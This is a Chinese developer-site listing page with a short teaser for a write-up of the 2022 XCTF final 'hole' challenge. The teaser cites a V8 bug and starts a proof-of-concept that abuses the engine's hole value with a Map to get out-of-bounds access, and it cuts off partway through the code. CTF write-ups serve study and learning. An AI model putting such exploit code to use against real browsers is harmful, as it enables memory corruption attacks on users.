首页
Python
Java
前端
数据库
Linux
Chatgpt专题
开发者工具箱
2022xctf专题
2022xctf-final hole
这个题是做到的第一个利用hole和map来制造oob的题目,挺有意思的记录一下 首先根据题目给出的信息可知涉及到此漏洞 https://crbug.com/1263462 poc如下: let theHole = %TheHole();m = new Map();m.set(1, 1);m.set(theHole, 1);m.delete(theHole);m.delete(the
阅读更多...